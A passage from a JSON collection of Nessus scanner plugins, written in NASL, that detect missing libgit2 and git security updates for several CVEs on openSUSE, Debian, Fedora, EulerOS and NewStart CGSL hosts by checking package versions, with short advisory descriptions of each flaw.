LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(118486);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\", \"CVE-2018-15501\", \"CVE-2018-8099\");\n\n script_name(english:\"openSUSE Security Update : libgit2 (openSUSE-2018-1314)\");\n script_summary(english:\"Check for the openSUSE-2018-1314 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libgit2 fixes the following issues :\n\n - CVE-2018-8099: Fixed possible denial of service attack\n via different vectors by not being able to differentiate\n between these status codes (bsc#1085256).\n\n - CVE-2018-11235: With a crafted .gitmodules file, a\n malicious project can execute an arbitrary script on a\n machine that runs 'git clone --recurse-submodules'\n because submodule 'names' are obtained from this file,\n and then appended to $GIT_DIR/modules, leading to\n directory traversal with '../' in a name. Finally,\n post-checkout hooks from a submodule are executed,\n bypassing the intended design in which hooks are not\n obtained from a remote server. (bsc#1095219)\n\n - CVE-2018-10887: It has been discovered that an\n unexpected sign extension in git_delta_apply function in\n delta.c file may have lead to an integer overflow which\n in turn leads to an out of bound read, allowing to read\n before the base object. An attacker could have used this\n flaw to leak memory addresses or cause a Denial of\n Service. (bsc#1100613)\n\n - CVE-2018-10888: A missing check in git_delta_apply\n function in delta.c file, may lead to an out-of-bound\n read while reading a binary delta file. An attacker may\n use this flaw to cause a Denial of Service.\n (bsc#1100612)\n\n - CVE-2018-15501: A remote attacker can send a crafted\n smart-protocol 'ng' packet that lacks a '\\0' byte to\n trigger an out-of-bounds read that leads to DoS.\n (bsc#1104641)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1085256\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095219\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1100612\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1100613\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1104641\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libgit2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-24\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-24-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-24-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-24-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libgit2-24-0.24.1-10.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libgit2-24-debuginfo-0.24.1-10.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libgit2-debugsource-0.24.1-10.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libgit2-devel-0.24.1-10.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libgit2-24-32bit-0.24.1-10.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libgit2-24-debuginfo-32bit-0.24.1-10.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libgit2-24 / libgit2-24-32bit / libgit2-24-debuginfo / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:31:28", "description": "CVE-2018-15501 A potential out-of-bounds read when processing a 'ng' smart packet might lead to a Denial of Service.\n\nCVE-2018-10887 A flaw has been discovered that may lead to an integer overflow which in turn leads to an out of bound read, allowing to read before the base object. This might be used to leak memory addresses or cause a Denial of Service.\n\nCVE-2018-10888 A flaw may lead to an out-of-bound read while reading a binary delta file. This might result in a Denial of Service.\n\nFor Debian 8 'Jessie', these problems have been fixed in version 0.21.1-3+deb8u1.\n\nWe recommend that you upgrade your libgit2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H"}, "published": "2018-08-28T00:00:00", "type": "nessus", "title": "Debian DLA-1477-1 : libgit2 security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-15501"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libgit2-21", "p-cpe:/a:debian:debian_linux:libgit2-dbg", "p-cpe:/a:debian:debian_linux:libgit2-dev", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DLA-1477.NASL", "href": "https://www.tenable.com/plugins/nessus/112126", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1477-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(112126);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-15501\");\n\n script_name(english:\"Debian DLA-1477-1 : libgit2 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2018-15501 A potential out-of-bounds read when processing a 'ng'\nsmart packet might lead to a Denial of Service.\n\nCVE-2018-10887 A flaw has been discovered that may lead to an integer\noverflow which in turn leads to an out of bound read, allowing to read\nbefore the base object. This might be used to leak memory addresses or\ncause a Denial of Service.\n\nCVE-2018-10888 A flaw may lead to an out-of-bound read while reading a\nbinary delta file. This might result in a Denial of Service.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n0.21.1-3+deb8u1.\n\nWe recommend that you upgrade your libgit2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/08/msg00024.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/libgit2\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgit2-21\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgit2-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgit2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libgit2-21\", reference:\"0.21.1-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgit2-dbg\", reference:\"0.21.1-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgit2-dev\", reference:\"0.21.1-3+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2021-08-19T12:31:44", "description": "Update to 0.26.4 (CVE-2018-11235)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-07-06T00:00:00", "type": "nessus", "title": "Fedora 27 : libgit2 (2018-94eb743dad)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libgit2", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2018-94EB743DAD.NASL", "href": "https://www.tenable.com/plugins/nessus/110932", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-94eb743dad.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110932);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-11235\");\n script_xref(name:\"FEDORA\", value:\"2018-94eb743dad\");\n\n script_name(english:\"Fedora 27 : libgit2 (2018-94eb743dad)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 0.26.4 (CVE-2018-11235)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-94eb743dad\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libgit2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libgit2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"libgit2-0.26.4-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libgit2\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:31:47", "description": "According to the version of the git packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - arbitrary code execution when recursively cloning a malicious repository (CVE-2018-11235)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-07-03T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP3 : git (EulerOS-SA-2018-1216)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:git", "p-cpe:/a:huawei:euleros:perl-Git", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2018-1216.NASL", "href": "https://www.tenable.com/plugins/nessus/110880", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110880);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2018-11235\"\n );\n\n script_name(english:\"EulerOS 2.0 SP3 : git (EulerOS-SA-2018-1216)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the git packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - arbitrary code execution when recursively cloning a\n malicious repository (CVE-2018-11235)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1216\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?45ea2788\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(3)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"git-1.8.3.1-14.h1\",\n \"perl-Git-1.8.3.1-14.h1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"3\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:20:43", "description": "The remote NewStart CGSL host, running version CORE 5.04 / MAIN 5.04, has git packages installed that are affected by a vulnerability:\n\n - In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur. With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs git clone\n --recurse-submodules because submodule names are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with ../ in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.\n (CVE-2018-11235)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-08-12T00:00:00", "type": "nessus", "title": "NewStart CGSL CORE 5.04 / MAIN 5.04 : git Vulnerability (NS-SA-2019-0027)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2021-01-14T00:00:00", "cpe": [], "id": "NEWSTART_CGSL_NS-SA-2019-0027_GIT.NASL", "href": "https://www.tenable.com/plugins/nessus/127189", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2019-0027. The text\n# itself is copyright (C) ZTE, Inc.\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(127189);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2018-11235\");\n\n script_name(english:\"NewStart CGSL CORE 5.04 / MAIN 5.04 : git Vulnerability (NS-SA-2019-0027)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote machine is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version CORE 5.04 / MAIN 5.04, has git packages installed that are affected by a\nvulnerability:\n\n - In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x\n before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before\n 2.17.1, remote code execution can occur. With a crafted\n .gitmodules file, a malicious project can execute an\n arbitrary script on a machine that runs git clone\n --recurse-submodules because submodule names are\n obtained from this file, and then appended to\n $GIT_DIR/modules, leading to directory traversal with\n ../ in a name. Finally, post-checkout hooks from a\n submodule are executed, bypassing the intended design in\n which hooks are not obtained from a remote server.\n (CVE-2018-11235)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2019-0027\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL git packages. Note that updated packages may not be available yet. Please contact ZTE for\nmore information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11235\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/ZTE-CGSL/release\");\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, \"NewStart Carrier Grade Server Linux\");\n\nif (release !~ \"CGSL CORE 5.04\" &&\n release !~ \"CGSL MAIN 5.04\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL CORE 5.04 / NewStart CGSL MAIN 5.04');\n\nif (!get_kb_item(\"Host/ZTE-CGSL/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"NewStart Carrier Grade Server Linux\", cpu);\n\nflag = 0;\n\npkgs = {\n \"CGSL CORE 5.04\": [\n \"emacs-git-1.8.3.1-14.el7_5\",\n \"emacs-git-el-1.8.3.1-14.el7_5\",\n \"git-1.8.3.1-14.el7_5\",\n \"git-all-1.8.3.1-14.el7_5\",\n \"git-bzr-1.8.3.1-14.el7_5\",\n \"git-cvs-1.8.3.1-14.el7_5\",\n \"git-daemon-1.8.3.1-14.el7_5\",\n \"git-debuginfo-1.8.3.1-14.el7_5\",\n \"git-email-1.8.3.1-14.el7_5\",\n \"git-gui-1.8.3.1-14.el7_5\",\n \"git-hg-1.8.3.1-14.el7_5\",\n \"git-p4-1.8.3.1-14.el7_5\",\n \"git-svn-1.8.3.1-14.el7_5\",\n \"gitk-1.8.3.1-14.el7_5\",\n \"gitweb-1.8.3.1-14.el7_5\",\n \"perl-Git-1.8.3.1-14.el7_5\",\n \"perl-Git-SVN-1.8.3.1-14.el7_5\"\n ],\n \"CGSL MAIN 5.04\": [\n \"emacs-git-1.8.3.1-14.el7_5\",\n \"emacs-git-el-1.8.3.1-14.el7_5\",\n \"git-1.8.3.1-14.el7_5\",\n 